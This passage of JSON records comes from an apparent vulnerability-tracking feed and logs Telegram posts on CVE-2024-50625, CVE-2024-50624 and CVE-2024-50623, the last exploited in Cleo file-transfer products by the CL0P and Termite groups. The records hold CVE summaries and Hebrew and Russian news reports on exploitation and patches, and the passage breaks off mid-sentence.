"1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-50625", "type": "seen", "source": "https://t.me/cvedetector/12453", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-50625 - Digi ConnectPort LTS File Path Manipulation and Privilege Escalation\", \n  \"Content\": \"CVE ID : CVE-2024-50625 \nPublished : Dec. 9, 2024, 10:15 p.m. | 37\u00a0minutes ago \nDescription : An issue was discovered in Digi ConnectPort LTS before 1.4.12. A vulnerability in the file upload handling of a web application allows manipulation of file paths via POST requests. This can lead to arbitrary file uploads within specific directories, potentially enabling privilege escalation when combined with other vulnerabilities. \nSeverity: 0.0 | NA \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"09 Dec 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-12-09T23:54:39.000000Z"}, {"uuid": "871a97e0-1431-46df-8edf-6b6a098bdfb2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-50624", "type": "seen", "source": "https://t.me/cvedetector/9081", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-50624 - KDE Kmail cleartext HTTP Configuration Retrieval Vulnerability\", \n  \"Content\": \"CVE ID : CVE-2024-50624 \nPublished : Oct. 28, 2024, 12:15 a.m. | 38\u00a0minutes ago \nDescription : ispdbservice.cpp in KDE Kmail before 6.2.0 allows man-in-the-middle attackers to trigger use of an attacker-controlled mail server because cleartext HTTP is used for a URL such as  or  for retrieving the configuration. This is related to kmail-account-wizard. \nSeverity: 0.0 | NA \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"28 Oct 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-10-28T01:56:29.000000Z"}, {"uuid": "0bd1e6f5-25f3-4aac-ab32-fdb5b69ca232", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-50623", "type": "seen", "source": "https://t.me/cvedetector/9080", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-50623 - Cleo Harmony/LexiCom Unsandboxed JavaScript Injection\", \n  \"Content\": \"CVE ID : CVE-2024-50623 \nPublished : Oct. 28, 2024, 12:15 a.m. | 38\u00a0minutes ago \nDescription : In Cleo Harmony before 5.8.0.20, VLTrader before 5.8.0.20, and LexiCom before 5.8.0.20, there is a JavaScript Injection vulnerability. \nSeverity: 0.0 | NA \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"28 Oct 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-10-28T01:56:29.000000Z"}, {"uuid": "0d46fc00-0dfa-43f6-8c0f-62e221acf160", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-50623", "type": "published-proof-of-concept", "source": "https://t.me/TheDarkWebInformer/8775", "content": "\ud83d\udea8Cleo Unrestricted File Upload and Download PoC (CVE-2024-50623)\n\nhttps://darkwebinformer.com/cleo-unrestricted-file-upload-and-download-poc-cve-2024-50623/", "creation_timestamp": "2024-12-12T17:02:39.000000Z"}, {"uuid": "413be8e3-fc80-4d35-be3b-69d94cf42318", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-50623", "type": "exploited", "source": "https://t.me/CyberSecurityIL/63555", "content": "\u05dc\u05e7\u05d1\u05d5\u05e6\u05ea \u05d4\u05ea\u05e7\u05d9\u05e4\u05d4 CL0P \u05e0\u05d2\u05de\u05e8 \u05d4\u05de\u05e7\u05d5\u05dd \u05d1\u05e9\u05e8\u05ea\u05d9\u05dd?\n\n\u05d1\u05e9\u05d1\u05d5\u05e2\u05d5\u05ea \u05d4\u05d0\u05d7\u05e8\u05d5\u05e0\u05d9\u05dd \u05e0\u05d5\u05e6\u05dc\u05d4 \u05d7\u05d5\u05dc\u05e9\u05d4 \u05e8\u05d7\u05d1\u05d4 \u05d1\u05de\u05e2\u05e8\u05db\u05ea \u05d4\u05e2\u05d1\u05e8\u05ea \u05d4\u05e7\u05d1\u05e6\u05d9\u05dd \u05e9\u05dc \u05d7\u05d1\u05e8\u05ea Cleo (\u05de\u05e9\u05ea\u05de\u05e9\u05d9\u05dd \u05d1\u05d6\u05d4 \u05d1\u05d0\u05e8\u05e5?)\n\u05e7\u05d1\u05d5\u05e6\u05d5\u05ea \u05ea\u05e7\u05d9\u05e4\u05d4 \u05e0\u05d9\u05e6\u05dc\u05d5 \u05d0\u05ea \u05d4\u05d7\u05d5\u05dc\u05e9\u05d4 \u05db\u05d3\u05d9 \u05dc\u05d2\u05e0\u05d5\u05d1 \u05de\u05d9\u05d3\u05e2 \u05d5\u05e0\u05e8\u05d0\u05d4 \u05db\u05d9 \u05e7\u05d1\u05d5\u05e6\u05ea CL0P \u05dc\u05e7\u05d7\u05d4 \u05d1\u05db\u05da \u05d7\u05dc\u05e7 \u05de\u05e8\u05db\u05d6\u05d9.\n\n\u05d4\u05e7\u05d1\u05d5\u05e6\u05d4 \u05de\u05e4\u05e8\u05e1\u05de\u05ea \u05d4\u05d5\u05d3\u05e2\u05d4 \u05dc\u05e4\u05d9\u05d4 \u05d1\u05e2\u05e7\u05d1\u05d5\u05ea \u05e0\u05d9\u05e6\u05d5\u05dc \u05d4\u05d7\u05d5\u05dc\u05e9\u05d4 \u05d1-Cleo \u05d4\u05d9\u05d0 \u05de\u05d5\u05d7\u05e7\u05ea \u05db\u05e2\u05ea \u05d0\u05ea \u05db\u05dc \u05d4\u05de\u05d9\u05d3\u05e2 \u05d4\u05e7\u05d5\u05d3\u05dd \u05e9\u05d4\u05d9\u05d4 \u05dc\u05d4 \u05d1\u05e9\u05e8\u05ea\u05d9\u05dd \u05d5\u05de\u05e2\u05db\u05e9\u05d9\u05d5 \u05d4\u05d9\u05d0 \u05ea\u05e2\u05d1\u05d5\u05d3 \u05e8\u05e7 \u05e2\u05dd \u05d7\u05d1\u05e8\u05d5\u05ea \u05d7\u05d3\u05e9\u05d5\u05ea.\n\u05e0\u05e9\u05de\u05e2 \u05db\u05d0\u05d9\u05dc\u05d5 \u05d4\u05e7\u05d1\u05d5\u05e6\u05d4 \u05ea\u05e7\u05e4\u05d4 \u05dc\u05d0 \u05de\u05e2\u05d8 \u05d0\u05e8\u05d2\u05d5\u05e0\u05d9\u05dd \u05d5\u05e6\u05e8\u05d9\u05db\u05d4 \u05dc\u05d4\u05ea\u05e8\u05db\u05d6 \u05d1\u05de\u05ea\u05e7\u05e4\u05d4 \u05d4\u05e0\u05d5\u05db\u05d7\u05d9\u05ea.\n\n\u05de\u05d6\u05db\u05d9\u05e8 \u05db\u05d9 \u05e7\u05d1\u05d5\u05e6\u05ea CL0P \u05d4\u05d9\u05d9\u05ea\u05d4 \u05d4\u05e7\u05d1\u05d5\u05e6\u05d4 \u05d4\u05de\u05e8\u05db\u05d6\u05d9\u05ea \u05e9\u05e0\u05d9\u05e6\u05dc\u05d4 \u05d1\u05e2\u05d1\u05e8 \u05d0\u05ea \u05d4\u05d7\u05d5\u05dc\u05e9\u05d4 \u05d1\u05de\u05e2\u05e8\u05db\u05ea \u05d4\u05e2\u05d1\u05e8\u05ea \u05d4\u05e7\u05d1\u05e6\u05d9\u05dd MOVEit \u05db\u05e9\u05d4\u05d9\u05d0 \u05ea\u05d5\u05e7\u05e4\u05ea \u05d5\u05d2\u05d5\u05e0\u05d1\u05ea \u05de\u05d9\u05d3\u05e2 \u05de\u05de\u05d0\u05d5\u05ea \u05d0\u05e8\u05d2\u05d5\u05e0\u05d9\u05dd.\n\n\u05d4\u05e1\u05d5\u05db\u05e0\u05d5\u05ea \u05dc\u05d4\u05d2\u05e0\u05ea \u05e1\u05d9\u05d9\u05d1\u05e8 \u05d5\u05ea\u05e9\u05ea\u05d9\u05d5\u05ea \u05d1\u05d0\u05e8\u05d4\"\u05d1 \u05e4\u05d9\u05e8\u05e1\u05de\u05d4 \u05d4\u05d5\u05d3\u05e2\u05d4 \u05dc\u05d0\u05d7\u05e8\u05d5\u05e0\u05d4 \u05db\u05d9 \u05d4\u05d7\u05d5\u05dc\u05e9\u05d4 \u05de\u05e0\u05d5\u05e6\u05dc\u05ea \u05e2\"\u05d9 \u05e7\u05d1\u05d5\u05e6\u05d5\u05ea \u05ea\u05e7\u05d9\u05e4\u05d4.\n\u05de\u05d3\u05d5\u05d1\u05e8 \u05d1\u05d7\u05d5\u05dc\u05e9\u05d4 (CVE-2024-50623) \u05e9\u05d9\u05e6\u05d0 \u05dc\u05d4 \u05ea\u05d9\u05e7\u05d5\u05df \u05d0\u05da \u05d4\u05ea\u05d9\u05e7\u05d5\u05df \u05dc\u05d0 \u05d4\u05d9\u05d4 \u05de\u05d5\u05e9\u05dc\u05dd \u05d5\u05de\u05d0\u05d5\u05d7\u05e8 \u05d9\u05d5\u05ea\u05e8 \u05d9\u05e6\u05d0 \u05ea\u05d9\u05e7\u05d5\u05df \u05e0\u05d5\u05e1\u05e3.\n\nhttps://t.me/CyberSecurityIL/6238\n\n#\u05d3\u05dc\u05e3_\u05de\u05d9\u05d3\u05e2 #\u05db\u05d5\u05e4\u05e8", "creation_timestamp": "2024-12-15T19:37:14.000000Z"}, {"uuid": "7c58bdf0-b695-42cd-89cc-ea1e37f891dd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-50623", "type": "exploited", "source": "https://t.me/true_secator/6541", "content": "\u042d\u043f\u043e\u043f\u0435\u044f \u0441 0-day \u0432 \u0440\u0435\u0448\u0435\u043d\u0438\u044f\u0445 Cleo VLTrader, Harmony \u0438 LexiCom, \u043d\u0430\u0445\u043e\u0434\u044f\u0449\u0435\u0439\u0441\u044f \u043f\u043e\u0434 \u043f\u0440\u0435\u0441\u0441\u043e\u043c \u0431\u0430\u043d\u0434\u044b \u0432\u044b\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u0435\u0439 Termite, \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u0442 \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0435 \u0440\u0430\u0437\u0432\u0438\u0442\u0438\u0435.\n\n\u041f\u0435\u0440\u0432\u044b\u0435 \u0430\u0442\u0430\u043a\u0438 \u043d\u0430 \u043f\u043e\u043b\u043d\u043e\u0441\u0442\u044c\u044e \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u043e\u0435 \u041f\u041e \u0431\u044b\u043b\u0438 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u044b Huntress \u0435\u0449\u0435 3 \u0434\u0435\u043a\u0430\u0431\u0440\u044f.\n\n\u0417\u0430\u0442\u0435\u043c \u043f\u043e\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043b \u0431\u0443\u0440\u043d\u044b\u0439 \u0440\u043e\u0441\u0442 \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u0438 \u043a 8 \u0434\u0435\u043a\u0430\u0431\u0440\u044f, \u043f\u043e\u0441\u043b\u0435 \u0442\u043e\u0433\u043e \u043a\u0430\u043a \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u0431\u044b\u0441\u0442\u0440\u043e \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0438 \u043e\u0431\u0445\u043e\u0434 CVE-2024-50623 (\u0431\u0435\u0437 CVE-ID), \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u043b \u0438\u043c\u043f\u043e\u0440\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0435 \u043a\u043e\u043c\u0430\u043d\u0434\u044b bash \u0438\u043b\u0438 PowerShell, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044f \u043d\u0430\u0441\u0442\u0440\u043e\u0439\u043a\u0438 \u043f\u0430\u043f\u043a\u0438 \u0430\u0432\u0442\u043e\u0437\u0430\u043f\u0443\u0441\u043a\u0430 \u043f\u043e \u0443\u043c\u043e\u043b\u0447\u0430\u043d\u0438\u044e.\n\n\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 BinaryDefense, Huntress \u0438 Rapid7 \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043b\u0438 \u0442\u0435\u0445\u043d\u0438\u0447\u0435\u0441\u043a\u0438\u0439 \u0430\u043d\u0430\u043b\u0438\u0437 \u043f\u043e\u043b\u0435\u0437\u043d\u043e\u0439 \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0438 (Java webshell/RAT/backdoor), \u0441\u0431\u0440\u043e\u0448\u0435\u043d\u043d\u043e\u0439 \u043d\u0430 \u0432\u0437\u043b\u043e\u043c\u0430\u043d\u043d\u044b\u0435 \u0441\u0435\u0440\u0432\u0435\u0440\u044b \u043f\u0435\u0440\u0435\u0434\u0430\u0447\u0438 \u0444\u0430\u0439\u043b\u043e\u0432 Cleo.\n\nHuntress \u043e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u0435\u0442 \u044d\u0442\u043e\u0442 \u0448\u0442\u0430\u043c\u043c \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0445 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c \u043a\u0430\u043a Malichus, \u0441\u043e\u043e\u0431\u0449\u0430\u044f \u043e \u0435\u0435 \u0440\u0430\u0437\u0432\u0435\u0440\u0442\u044b\u0432\u0430\u043d\u0438\u044f\u0445 \u0438\u0441\u043a\u043b\u044e\u0447\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u043d\u0430 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430\u0445 Windows, \u043d\u043e \u043f\u0440\u0438 \u043d\u0430\u043b\u0438\u0447\u0438\u0438 \u0442\u0430\u043a\u0436\u0435 \u043f\u043e\u0434\u0434\u0435\u0440\u0436\u043a\u0438 Linux.\n\n\u0412 \u0441\u0432\u043e\u044e \u043e\u0447\u0435\u0440\u0435\u0434\u044c, \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 watchTowr Labs \u0440\u0435\u0448\u0438\u043b\u0438 \u043f\u043e\u0434\u043b\u0438\u0442\u044c \u043c\u0430\u0441\u043b\u0430 \u0432 \u043e\u0433\u043e\u043d\u044c \u0438 \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b\u0438 \u044d\u043a\u0441\u043f\u0435\u0440\u0438\u043c\u0435\u043d\u0442\u0430\u043b\u044c\u043d\u044b\u0439 PoC \u0434\u043b\u044f \u043d\u0443\u043b\u044f (CVE-2024-50623) \u0432 \u0441\u0435\u0440\u0432\u0435\u0440\u0430\u0445 \u043f\u0435\u0440\u0435\u0434\u0430\u0447\u0438 \u0444\u0430\u0439\u043b\u043e\u0432 Cleo.\n\n\u041f\u043e\u0441\u0442\u0430\u0432\u0449\u0438\u043a \u0436\u0435 \u043a \u044d\u0442\u043e\u043c\u0443 \u0432\u0440\u0435\u043c\u0435\u043d\u0438 \u0443\u0441\u043f\u0435\u043b \u0440\u0430\u0437\u043e\u0431\u0440\u0430\u0442\u044c\u0441\u044f \u0432 \u0441\u0443\u0442\u0438 \u043f\u0440\u043e\u0431\u043b\u0435\u043c \u0438 \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u0442\u044c \u0432 \u0441\u0440\u0435\u0434\u0443 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435 (5.8.0.24).\n\n\u041e\u0434\u043d\u0430\u043a\u043e \u0447\u0438\u0441\u043b\u043e \u043f\u043e\u0434\u0442\u0432\u0435\u0440\u0436\u0434\u0435\u043d\u043d\u044b\u0445 \u0436\u0435\u0440\u0442\u0432 \u043a \u044d\u0442\u043e\u043c\u0443 \u0432\u0440\u0435\u043c\u0435\u043d\u0438 \u0443\u0436\u0435 \u0432\u043e\u0437\u0440\u043e\u0441\u043b\u043e \u0434\u043e 50, \u0430 \u0447\u0438\u0441\u043b\u043e \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b\u0445 \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432 Cleo \u0432\u0441\u0435 \u0435\u0449\u0435 \u0434\u043e\u0441\u0442\u0438\u0433\u0430\u0435\u0442 \u043f\u043e\u0447\u0442\u0438 400 \u044d\u043a\u0437\u0435\u043c\u043f\u043b\u044f\u0440\u043e\u0432, \u0431\u043e\u043b\u044c\u0448\u0430\u044f \u0447\u0430\u0441\u0442\u044c \u0438\u0437 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u043d\u0430\u0445\u043e\u0434\u044f\u0442\u0441\u044f \u0432 \u0421\u0428\u0410.\n\n\u0422\u0430\u043a \u0447\u0442\u043e \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u0435\u043c \u0441\u043b\u0435\u0434\u0438\u0442\u044c \u0437\u0430 \u0440\u0430\u0437\u0432\u0438\u0442\u0438\u0435\u043c \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u0438 \u0431\u0430\u043d\u0434\u044b Termite. \u041a\u043e\u043d\u0435\u0447\u043d\u043e, \u043d\u0435 \u043c\u0430\u0441\u0448\u0442\u0430\u0431\u044b Clop - \u043d\u043e \u043f\u043e\u0434\u0445\u043e\u0434 \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0435\u043d\u043d\u043e \u0437\u0430\u0441\u0447\u0438\u0442\u0430\u043d.", "creation_timestamp": "2024-12-13T14:00:07.000000Z"}, {"uuid": "807ce8cc-079b-419c-9ca3-74da0504a718", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-50623", "type": "exploited", "source": "https://t.me/true_secator/6528", "content": "\u041f\u043e \u0432\u0441\u0435\u0439 \u0432\u0438\u0434\u0438\u043c\u043e\u0441\u0442\u0438, \u043d\u0430 \u0433\u043e\u0440\u0438\u0437\u043e\u043d\u0442\u0435 \u043d\u043e\u0432\u044b\u0439 \u0441\u043e\u043f\u043e\u0441\u0442\u0430\u0432\u0438\u043c\u044b\u0439 \u0441 MOVEit \u043c\u0430\u0441\u0448\u0442\u0430\u0431\u043d\u044b\u0439 \u0438\u043d\u0446\u0438\u0434\u0435\u043d\u0442, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u044b\u0439 \u0441 \u0430\u0442\u0430\u043a\u0430\u043c\u0438 \u0431\u0430\u043d\u0434\u044b \u0432\u044b\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u0435\u0439 Termite, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043d\u0430\u0446\u0435\u043b\u0435\u043d\u044b \u043d\u0430 0-day \u0432 \u0440\u0435\u0448\u0435\u043d\u0438\u044f\u0445 \u0434\u043b\u044f \u043f\u0435\u0440\u0435\u0434\u0430\u0447\u0438 \u0444\u0430\u0439\u043b\u043e\u0432 Cleo.\n\n\u041f\u043e \u0434\u0430\u043d\u043d\u044b\u043c Huntress Labs, \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u044f \u043d\u0430\u0447\u0430\u043b\u0430\u0441\u044c 3 \u0434\u0435\u043a\u0430\u0431\u0440\u044f \u0438 \u0437\u0430\u0442\u0440\u043e\u043d\u0443\u043b\u0430 \u043a \u043d\u0430\u0441\u0442\u043e\u044f\u0449\u0435\u043c\u0443 \u0432\u0440\u0435\u043c\u0435\u043d\u0438 \u0443\u0436\u0435 \u043d\u0435 \u043c\u0435\u043d\u0435\u0435 \u0434\u0435\u0441\u044f\u0442\u0438 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0439. \n\nTermite \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u0442 \u043e\u0448\u0438\u0431\u043a\u0443, \u0438\u0437\u043d\u0430\u0447\u0430\u043b\u044c\u043d\u043e \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u0443\u044e \u0432 \u043a\u043e\u043d\u0446\u0435 \u043e\u043a\u0442\u044f\u0431\u0440\u044f, \u043a\u043e\u0442\u043e\u0440\u043e\u0439 \u043f\u043e\u0434\u0432\u0435\u0440\u0436\u0435\u043d\u044b \u043f\u0440\u043e\u0434\u0443\u043a\u0442\u044b Cleo: Harmony, LexiCom \u0438 VLTrader.\n\n\u041e\u0448\u0438\u0431\u043a\u0430 \u043e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u0435\u0442\u0441\u044f \u043a\u0430\u043a CVE-2024-50623 \u0438 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u0441\u043e\u0431\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043d\u0435\u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0435\u043d\u043d\u043e\u0439 \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0438 \u0438 \u0441\u043a\u0430\u0447\u0438\u0432\u0430\u043d\u0438\u044f \u0444\u0430\u0439\u043b\u043e\u0432, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043c\u043e\u0436\u0435\u0442 \u043f\u0440\u0438\u0432\u0435\u0441\u0442\u0438 \u043a RCE-\u0430\u0442\u0430\u043a\u0430\u043c.\n\n\u041f\u043e \u043c\u043d\u0435\u043d\u0438\u044e Huntress, \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435 \u043d\u0435 \u0431\u044b\u043b\u043e \u0440\u0435\u0430\u043b\u0438\u0437\u043e\u0432\u0430\u043d\u043e \u0434\u043e\u043b\u0436\u043d\u044b\u043c \u043e\u0431\u0440\u0430\u0437\u043e\u043c, \u0430 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0434\u043b\u044f \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0438 \u0432\u0435\u0431-\u0448\u0435\u043b\u043b\u043e\u0432 \u043d\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0435 \u043f\u0440\u043e\u0434\u0443\u043a\u0442\u044b \u0441 \u0446\u0435\u043b\u044c\u044e \u043a\u0440\u0430\u0436\u0438 \u0434\u0430\u043d\u043d\u044b\u0445 \u0438 \u0441\u043a\u0440\u044b\u0442\u043e\u0433\u043e \u043f\u0435\u0440\u0435\u043c\u0435\u0449\u0435\u043d\u0438\u044f \u0432\u043d\u0443\u0442\u0440\u0438 \u0432\u0437\u043b\u043e\u043c\u0430\u043d\u043d\u044b\u0445 \u0441\u0435\u0442\u0435\u0439.\n\n\u0412 \u043d\u0430\u0441\u0442\u043e\u044f\u0449\u0435\u0435 \u0432\u0440\u0435\u043c\u044f \u043d\u0435\u044f\u0441\u043d\u043e, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u043b\u0438 \u0431\u0430\u043d\u0434\u0430 Termite \u0441\u0432\u043e\u044e ransomware \u0432 \u043e\u0442\u043d\u043e\u0448\u0435\u043d\u0438\u0438 \u0432\u0437\u043b\u043e\u043c\u0430\u043d\u043d\u044b\u0445 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0439 \u0438\u043b\u0438 \u0436\u0435 \u043f\u0440\u043e\u0441\u0442\u043e \u043a\u0440\u0430\u0434\u0435\u0442 \u0434\u0430\u043d\u043d\u044b\u0435 \u0434\u043b\u044f \u0431\u0443\u0434\u0443\u0449\u0435\u0433\u043e \u0432\u044b\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u044c\u0441\u0442\u0432\u0430.\n\n\u041f\u043e\u0441\u0442\u0430\u0432\u0449\u0438\u043a \u043f\u043e\u0434\u0442\u0432\u0435\u0440\u0434\u0438\u043b \u043d\u043e\u0432\u044b\u0435 \u0430\u0442\u0430\u043a\u0438 \u0438 \u0437\u0430\u044f\u0432\u0438\u043b, \u0447\u0442\u043e \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 \u043d\u0430\u0434 \u043d\u043e\u0432\u044b\u043c \u043f\u0430\u0442\u0447\u0435\u043c.\n\n\u0412 \u0432\u0438\u0434\u0443 \u0442\u043e\u0433\u043e, \u0447\u0442\u043e \u043d\u043e\u0432\u044b\u0439 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442 \u0437\u0430\u0434\u0435\u0439\u0441\u0442\u0432\u0443\u0435\u0442 \u0444\u0443\u043d\u043a\u0446\u0438\u044e \u0430\u0432\u0442\u043e\u0437\u0430\u043f\u0443\u0441\u043a\u0430 \u0434\u043b\u044f \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u0447\u0430\u0441\u0442\u0438 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u043a\u043e\u0434\u0430, Cleo \u043f\u043e\u0441\u043e\u0432\u0435\u0442\u043e\u0432\u0430\u043b\u0430 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u043c \u043e\u0442\u043a\u043b\u044e\u0447\u0438\u0442\u044c \u0435\u0435, \u043f\u043e\u043a\u0430 \u043d\u0435 \u0431\u0443\u0434\u0435\u0442 \u0434\u043e\u0441\u0442\u0443\u043f\u0435\u043d \u043f\u0430\u0442\u0447.\n\n\u041f\u043e \u0434\u0430\u043d\u043d\u044b\u043c Shodan, \u0432 \u043d\u0430\u0441\u0442\u043e\u044f\u0449\u0435\u0435 \u0432\u0440\u0435\u043c\u044f \u0431\u043e\u043b\u0435\u0435 500 \u043f\u0440\u043e\u0434\u0443\u043a\u0442\u043e\u0432 Cleo \u043d\u0430\u0445\u043e\u0434\u044f\u0442\u0441\u044f \u0432 \u0441\u0435\u0442\u0438 \u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u044b \u0434\u043b\u044f \u0432\u043e\u043b\u043d\u044b \u0430\u0442\u0430\u043a Termite.\n\n\u0427\u0442\u043e \u0436\u0435 \u043a\u0430\u0441\u0430\u0435\u0442\u0441\u044f \u0441\u0430\u043c\u043e\u0439 \u0433\u0440\u0443\u043f\u043f\u044b - \u044d\u0442\u043e \u043d\u043e\u0432\u0438\u0447\u043e\u043a \u0432 \u043e\u0431\u043b\u0430\u0441\u0442\u0438 ramsonware.\n\n\u0411\u0430\u043d\u0434\u0430 \u043d\u0430\u0447\u0430\u043b\u0430 \u0441\u0432\u043e\u044e \u0434\u0435\u044f\u0442\u0435\u043b\u044c\u043d\u043e\u0441\u0442\u044c \u0432 \u0442\u0435\u0447\u0435\u043d\u0438\u0435 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0435\u0433\u043e \u043c\u0435\u0441\u044f\u0446\u0430 \u0438 \u0443\u0436\u0435 \u0437\u0430\u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u043e\u0432\u0430\u043b\u0430 \u0441\u0435\u0431\u044f \u0431\u043b\u0430\u0433\u043e\u0434\u0430\u0440\u044f \u043d\u0435\u0434\u0430\u0432\u043d\u0435\u0439 \u0430\u0442\u0430\u043a\u0438 \u043d\u0430\u00a0\u0430\u0442\u0430\u043a\u0435 \u043d\u0430 \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0430 \u041f\u041e BlueYonder, \u043e\u0431\u0441\u043b\u0443\u0436\u0438\u0432\u0430\u044e\u0449\u0435\u0433\u043e \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u044b \u043a\u0440\u0443\u043f\u043d\u044b\u0445 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0439, \u0432\u043a\u043b\u044e\u0447\u0430\u044f Sainsbury's, Morrisons, Starbucks \u0438 \u0434\u0440.\n\n\u041f\u0440\u0438 \u044d\u0442\u043e\u043c, \u043e\u0442\u043c\u0435\u0447\u0430\u044e\u0442 \u0432 Huntress Labs, \u0434\u043e \u0430\u0442\u0430\u043a\u0438 Blue Yonder \u0438\u043c\u0435\u043b\u0430 \u043e\u0442\u043a\u0440\u044b\u0442\u044b\u0439 \u0432 \u0418\u043d\u0442\u0435\u0440\u043d\u0435\u0442\u0435 \u043f\u0440\u043e\u0434\u0443\u043a\u0442 Cleo, \u043a\u043e\u0442\u043e\u0440\u044b\u0439, \u0432\u0435\u0440\u043e\u044f\u0442\u043d\u043e, \u0438 \u043c\u043e\u0433 